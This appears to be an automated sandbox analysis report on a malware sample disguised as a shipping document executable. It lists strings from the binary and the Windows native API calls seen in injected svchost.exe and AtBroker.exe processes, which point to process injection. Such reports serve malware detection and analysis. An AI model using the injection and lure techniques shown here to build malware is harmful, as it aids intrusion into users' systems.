Source: shipping doc_20241111.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_20553bbd-c

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: shipping doc_20241111.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0256C9E3 NtClose,	1_2_0256C9E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172B60 NtClose,LdrInitializeThunk,	1_2_03172B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03172DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,	1_2_031735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03174340 NtSetContextThread,	1_2_03174340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03174650 NtSuspendThread,	1_2_03174650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172B80 NtQueryInformationFile,	1_2_03172B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BA0 NtEnumerateValueKey,	1_2_03172BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BF0 NtAllocateVirtualMemory,	1_2_03172BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BE0 NtQueryValueKey,	1_2_03172BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AB0 NtWaitForSingleObject,	1_2_03172AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AD0 NtReadFile,	1_2_03172AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AF0 NtWriteFile,	1_2_03172AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F30 NtCreateSection,	1_2_03172F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F60 NtCreateProcessEx,	1_2_03172F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F90 NtProtectVirtualMemory,	1_2_03172F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FB0 NtResumeThread,	1_2_03172FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FA0 NtQuerySection,	1_2_03172FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FE0 NtCreateFile,	1_2_03172FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172E30 NtWriteVirtualMemory,	1_2_03172E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172E80 NtReadVirtualMemory,	1_2_03172E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172EA0 NtAdjustPrivilegesToken,	1_2_03172EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172EE0 NtQueueApcThread,	1_2_03172EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D10 NtMapViewOfSection,	1_2_03172D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D00 NtSetInformationFile,	1_2_03172D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D30 NtUnmapViewOfSection,	1_2_03172D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DB0 NtEnumerateKey,	1_2_03172DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DD0 NtDelayExecution,	1_2_03172DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C00 NtQueryInformationProcess,	1_2_03172C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C70 NtFreeVirtualMemory,	1_2_03172C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C60 NtCreateKey,	1_2_03172C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CA0 NtQueryInformationToken,	1_2_03172CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CC0 NtQueryVirtualMemory,	1_2_03172CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CF0 NtOpenProcess,	1_2_03172CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173010 NtOpenDirectoryObject,	1_2_03173010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173090 NtSetValueKey,	1_2_03173090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031739B0 NtGetContextThread,	1_2_031739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173D10 NtOpenProcessToken,	1_2_03173D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173D70 NtOpenThread,	1_2_03173D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04694650 NtSuspendThread,LdrInitializeThunk,	3_2_04694650
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04694340 NtSetContextThread,LdrInitializeThunk,	3_2_04694340
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692C60 NtCreateKey,LdrInitializeThunk,	3_2_04692C60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_04692C70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_04692CA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_04692D30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_04692D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_04692DF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692DD0 NtDelayExecution,LdrInitializeThunk,	3_2_04692DD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692EE0 NtQueueApcThread,LdrInitializeThunk,	3_2_04692EE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_04692E80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692F30 NtCreateSection,LdrInitializeThunk,	3_2_04692F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692FE0 NtCreateFile,LdrInitializeThunk,	3_2_04692FE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692FB0 NtResumeThread,LdrInitializeThunk,	3_2_04692FB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692AF0 NtWriteFile,LdrInitializeThunk,	3_2_04692AF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692AD0 NtReadFile,LdrInitializeThunk,	3_2_04692AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692B60 NtClose,LdrInitializeThunk,	3_2_04692B60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692BE0 NtQueryValueKey,LdrInitializeThunk,	3_2_04692BE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_04692BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692BA0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_04692BA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046935C0 NtCreateMutant,LdrInitializeThunk,	3_2_046935C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046939B0 NtGetContextThread,LdrInitializeThunk,	3_2_046939B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692C00 NtQueryInformationProcess,	3_2_04692C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692CF0 NtOpenProcess,	3_2_04692CF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692CC0 NtQueryVirtualMemory,	3_2_04692CC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692D00 NtSetInformationFile,	3_2_04692D00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692DB0 NtEnumerateKey,	3_2_04692DB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692E30 NtWriteVirtualMemory,	3_2_04692E30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692EA0 NtAdjustPrivilegesToken,	3_2_04692EA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692F60 NtCreateProcessEx,	3_2_04692F60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692FA0 NtQuerySection,	3_2_04692FA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692F90 NtProtectVirtualMemory,	3_2_04692F90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692AB0 NtWaitForSingleObject,	3_2_04692AB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04692B80 NtQueryInformationFile,	3_2_04692B80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04693010 NtOpenDirectoryObject,	3_2_04693010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04693090 NtSetValueKey,	3_2_04693090
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04693D70 NtOpenThread,	3_2_04693D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04693D10 NtOpenProcessToken,	3_2_04693D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004C9350 NtCreateFile,	3_2_004C9350
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004C94C0 NtReadFile,	3_2_004C94C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004C95B0 NtDeleteFile,	3_2_004C95B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004C9650 NtClose,	3_2_004C9650
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004C97B0 NtAllocateVirtualMemory,	3_2_004C97B0

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FAD588: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00FAD588

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FA1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00FA1145

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FAE814 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00FAE814

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FA81EE	0_2_00FA81EE
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F4E3F0	0_2_00F4E3F0
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F7E4A0	0_2_00F7E4A0
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F766FB	0_2_00F766FB
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FD47A8	0_2_00FD47A8
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F6CA30	0_2_00F6CA30
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F4AB30	0_2_00F4AB30
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F5ADFD	0_2_00F5ADFD
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F76D79	0_2_00F76D79
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F492A0	0_2_00F492A0
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F5D3B5	0_2_00F5D3B5
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F61324	0_2_00F61324
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F61696	0_2_00F61696
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F677AB	0_2_00F677AB
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F5B728	0_2_00F5B728
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F499D0	0_2_00F499D0
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F679DA	0_2_00F679DA
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F61940	0_2_00F61940
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F67C37	0_2_00F67C37
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F61C07	0_2_00F61C07
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FCBD6B	0_2_00FCBD6B
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F61EC2	0_2_00F61EC2
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F5BEAD	0_2_00F5BEAD
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F79E8E	0_2_00F79E8E
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB1F64	0_2_00FB1F64
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_015AB978	0_2_015AB978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02558983	1_2_02558983
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02550243	1_2_02550243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02541210	1_2_02541210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_025422F0	1_2_025422F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02556BD3	1_2_02556BD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0256F073	1_2_0256F073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02542810	1_2_02542810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_025430F0	1_2_025430F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_025410A0	1_2_025410A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02542C70	1_2_02542C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02542C64	1_2_02542C64
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02550463	1_2_02550463
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_025424D9	1_2_025424D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_025424C0	1_2_025424C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0254E4E3	1_2_0254E4E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_025424B8	1_2_025424B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA352	1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032003E6	1_2_032003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C02C0	1_2_031C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130100	1_2_03130100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C8158	1_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032001AA	1_2_032001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F41A2	1_2_031F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F81CC	1_2_031F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D2000	1_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164750	1_2_03164750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140770	1_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313C7C0	1_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315C6E0	1_2_0315C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03200591	1_2_03200591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4420	1_2_031E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F2446	1_2_031F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EE4F6	1_2_031EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FAB40	1_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F6BD7	1_2_031F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320A9A6	1_2_0320A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314A840	1_2_0314A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03142840	1_2_03142840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031268B8	1_2_031268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E8F0	1_2_0316E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160F30	1_2_03160F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E2F30	1_2_031E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03182F28	1_2_03182F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B4F40	1_2_031B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BEFA0	1_2_031BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132FC8	1_2_03132FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FEE26	1_2_031FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140E59	1_2_03140E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152E90	1_2_03152E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FCE93	1_2_031FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FEEDB	1_2_031FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DCD1F	1_2_031DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314AD00	1_2_0314AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03158DBF	1_2_03158DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313ADE0	1_2_0313ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140C00	1_2_03140C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0CB5	1_2_031E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130CF2	1_2_03130CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F132D	1_2_031F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312D34C	1_2_0312D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0318739A	1_2_0318739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031452A0	1_2_031452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315B2C0	1_2_0315B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315D2F0	1_2_0315D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E12ED	1_2_031E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320B16B	1_2_0320B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312F172	1_2_0312F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317516C	1_2_0317516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314B1B0	1_2_0314B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EF0CC	1_2_031EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031470C0	1_2_031470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F70E9	1_2_031F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF0E0	1_2_031FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF7B0	1_2_031FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03185630	1_2_03185630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F16CC	1_2_031F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7571	1_2_031F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DD5B0	1_2_031DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032095C3	1_2_032095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FF43F	1_2_031FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03131460	1_2_03131460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFB76	1_2_031FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315FB80	1_2_0315FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B5BF0	1_2_031B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317DBF9	1_2_0317DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFA49	1_2_031FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7A46	1_2_031F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B3A6C	1_2_031B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DDAAC	1_2_031DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03185AA0	1_2_03185AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E1AA3	1_2_031E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EDAC6	1_2_031EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D5910	1_2_031D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03149950	1_2_03149950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315B950	1_2_0315B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AD800	1_2_031AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031438E0	1_2_031438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFF09	1_2_031FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03141F92	1_2_03141F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFFB1	1_2_031FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103FD2	1_2_03103FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03103FD5	1_2_03103FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03149EB0	1_2_03149EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F1D5A	1_2_031F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03143D40	1_2_03143D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F7D73	1_2_031F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315FDC0	1_2_0315FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B9C32	1_2_031B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FFCF2	1_2_031FFCF2
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028CBA70	2_2_028CBA70
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028B5345	2_2_028B5345
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028AAEE0	2_2_028AAEE0
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028ACE60	2_2_028ACE60
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028ACC40	2_2_028ACC40
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028B35D0	2_2_028B35D0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04712446	3_2_04712446
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04704420	3_2_04704420
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0470E4F6	3_2_0470E4F6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04660535	3_2_04660535
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04720591	3_2_04720591
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0467C6E0	3_2_0467C6E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04660770	3_2_04660770
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04684750	3_2_04684750
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0465C7C0	3_2_0465C7C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0466807D	3_2_0466807D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046F2000	3_2_046F2000
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046E8158	3_2_046E8158
